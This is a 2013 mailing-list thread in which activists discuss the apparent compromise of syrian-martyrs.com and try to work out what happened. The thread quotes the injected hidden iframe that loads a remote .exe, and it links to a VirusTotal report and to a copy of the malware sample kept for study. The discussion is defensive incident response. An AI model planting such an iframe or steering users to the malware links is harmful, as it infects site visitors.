Search Mailing List Archives


Limit search to: Subject & Body Subject Author
Sort by: Reverse Sort
Limit to: All This Week Last Week This Month Last Month
Select Date Range     through    

[liberationtech] Syrian-martyrs.com website probably compromised by virus

KheOps kheops at ceops.eu
Tue Jan 29 14:40:36 PST 2013


Hey,

Le 29/01/2013 23:34, SiNA Rabbani a écrit :
> This is the malware:
>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

Yes, saw that too.

However, I don't find any precise description of its behaviour. Like,
what it does, if it opens any port, sends data to a C&C or whatever.

I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/

All the best,

> 
> 
> --SiNA
> 
> 
> 
> SiNA
> 
> Rabbani:
>> holly shit:
> 
>> <iframe name="I1" width="10" height="10" 
>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
> 
> 
> border="0"
>> frameborder="0">
> 
> 
>> :/ if you are running windows don't even go there!!!
> 
> 
>> Andrew Lewis:
>>> I can get to this in 6 hours or so, maybe someone is willing to 
>>> jump on this before then?
> 
>>> -Andrew
> 
>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
>>>> Dear Libtech,
>>>>
>>>> We just saw that the website : http://www.syrian-martyrs.com
>>>> is probably compromised. Every page of the website contains an 
>>>> iFrame which links to a .exe file which is detected as a virus
>>>> by antivirus software: 
>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>
>>>>
>>>>
> 
>>>>
> The fact that the HTML code is present at the bottom of each page makes
>>>> me think that the "index.php" page has been changed in a way
>>>> that makes that iFrame appear on every page of the website,
>>>> after the dynamic content.
>>>>
>>>> It also probably means that the attackers have some kind of 
>>>> access to the server. My guess would be going to a PHP shell,
>>>> but I'm no expert in this.
>>>>
>>>> Any help, clue, investigation, would be very welcome :)
>>>>
>>>> Thank you, KheOps
>>>>
>>>> -- Unsubscribe, change to digest, or change password at: 
>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>> -- Unsubscribe, change to digest, or change password at: 
>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> 
> 
> --
> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 



More information about the liberationtech mailing list